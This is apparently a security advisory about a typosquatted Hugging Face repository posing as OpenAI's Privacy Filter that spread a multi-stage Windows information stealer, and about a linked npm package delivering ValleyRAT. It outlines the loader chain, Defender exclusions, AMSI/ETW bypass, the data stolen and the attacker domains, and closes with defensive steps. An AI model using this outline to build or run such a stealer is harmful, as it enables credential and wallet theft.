Typosquatted OpenAI Privacy Filter on Hugging Face Delivered Information Stealer to 244,000 Users in 18 Hours

TL;DR A malicious Hugging Face repository impersonating OpenAI's Privacy Filter reached the platform's #1 trending position with approximately 244,000 downloads in 18 hours before being disabled. The fake repository contained a loader that executed a multi-stage Windows information stealer. Infrastructure overlap with a separate npm package delivering ValleyRAT suggests coordinated supply chain attacks targeting open-source ecosystems.

What happened

In May 2026, security researchers at HiddenLayer identified a typosquatted repository on Hugging Face named Open-OSS/privacy-filter that mimicked OpenAI's legitimate Privacy Filter release. The malicious project copied the legitimate model's description verbatim to deceive users. OpenAI's Privacy Filter itself was unveiled in April 2026 as a tool to detect and redact personally identifiable information (PII) in unstructured text.

The fake repository achieved #1 trending status on Hugging Face with approximately 244,000 downloads and 667 likes within 18 hours. The download counts are suspected to have been artificially inflated to create an illusion of legitimacy.

The attack chain began when users cloned the repository and executed either a batch script (Windows) or Python loader (Linux/macOS). On Windows systems, the Python loader disabled SSL verification, decoded a Base64-encoded URL from JSON Keeper (a public JSON paste service), and extracted a PowerShell command for execution. This command downloaded a batch script from "api.eth-fastscan[.]org" and launched it via cmd.exe.

The batch script escalated privileges using a UAC prompt, configured Microsoft Defender Antivirus exclusions, downloaded a second-stage binary from the same domain, and created a scheduled task to execute a PowerShell script. Critically, the task deleted itself after execution without establishing persistence—functioning as a one-shot SYSTEM-context launcher.

The final stage information stealer targeted sensitive data: screenshots, Discord credentials and data, cryptocurrency wallets and extensions, system metadata, FileZilla configurations, wallet seed phrases, and credentials stored in Chromium and Gecko browsers. The stealer attempted to disable Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) to evade behavioral detection. Exfiltrated data was sent in JSON format to "recargapopular[.]com."

Analysis uncovered six additional malicious repositories from user 'anthfu' using similar Python loaders: anthfu/Bonsai-8B-gguf, anthfu/Qwen3.6-35B-A3B-APEX-GGUF, anthfu/DeepSeek-V4-Pro, anthfu/Qwopus-GLM-18B-Merged-GGUF, anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF, and anthfu/supergemma4-26b-uncensored-gguf-v2.

Infrastructure overlap emerged with a separate campaign: the domain "api.eth-fastscan[.]org" was previously used to serve a Windows executable ("o0q2l47f.exe") that beaconed to "welovechinatown[.]info," a command-and-control server linked to a malicious npm package named 'trevlo'. Published on April 4, 2026, by user 'titaniumg', the trevlo package was downloaded more than 2,300 times and has since been removed from npm. Its postinstall hook executed an obfuscated JavaScript loader that spawned a base64-encoded PowerShell command, ultimately delivering ValleyRAT (also known as Winos 4.0). The use of ValleyRAT is exclusively attributed to Silver Fox, a Chinese hacking group.

Why it matters

For developers and DevOps teams, this incident demonstrates the vulnerability of open-source distribution platforms to typosquatting and supply chain compromise. The artificial inflation of download counts and trending position signals a coordinated effort to maximise exposure. The use of legitimate-appearing model repositories as infection vectors bypasses many developers' trust assumptions about curated platforms.

For SOC analysts and security teams, the attack chains present multiple evasion techniques: SSL verification disabling, AMSI/ETW bypass attempts, UAC elevation, Defender exclusion configuration, and VM detection checks. The use of public paste services (JSON Keeper) as dead drop resolvers allows attackers to pivot payloads without modifying the original malicious repository—a technique that complicates signature-based detection.

The infrastructure overlap between the Hugging Face and npm campaigns indicates a broader supply chain operation targeting open-source ecosystems. This suggests threat actors are systematically abusing multiple distribution channels and may have identified open-source platforms as efficient initial access vectors.

Affected systems and CVEs

Hugging Face (repository hosting platform)
npm (Node.js package registry)
Windows systems (primary attack surface for information stealer)
Linux and macOS systems (secondary attack surface via Python loader)
Applications dependent on affected repositories (Discord, Chromium browsers, Gecko browsers, FileZilla, cryptocurrency wallet managers)

No CVE assigned at the time of publication.

What to do

Verify the authenticity of any OpenAI Privacy Filter repository through official OpenAI channels before downloading or using in production environments.
Review repository sources and publisher identity before cloning or installing dependencies from open-source platforms.
Monitor systems for execution of suspicious batch scripts or Python loaders from untrusted sources, particularly those downloading and executing remote scripts via PowerShell.
Implement application whitelisting policies to prevent unauthorised script execution.
Audit npm package dependencies for postinstall hooks; consider disabling postinstall scripts where not operationally necessary.
If systems downloaded the malicious Hugging Face repository or trevlo npm package, assume compromise and conduct forensic analysis for indicators of the information stealer (screenshots exfiltration, browser credential theft, Discord session tokens).
Review Microsoft Defender Antivirus and ETW logs for evidence of exclusion configuration or disabling attempts.

Open questions

Whether download counts for both the Hugging Face repository and the trevlo npm package were artificially boosted using automation.
The full identity and operational scope of the actors behind the malicious Hugging Face and npm repositories.
Whether all six identified malicious repositories under 'anthfu' were deployed by the same threat actor.
The total number of users whose systems may have executed the information stealer payload.
Whether the malware successfully exfiltrated credentials from the full 244,000 downloads or whether many downloads did not result in payload execution.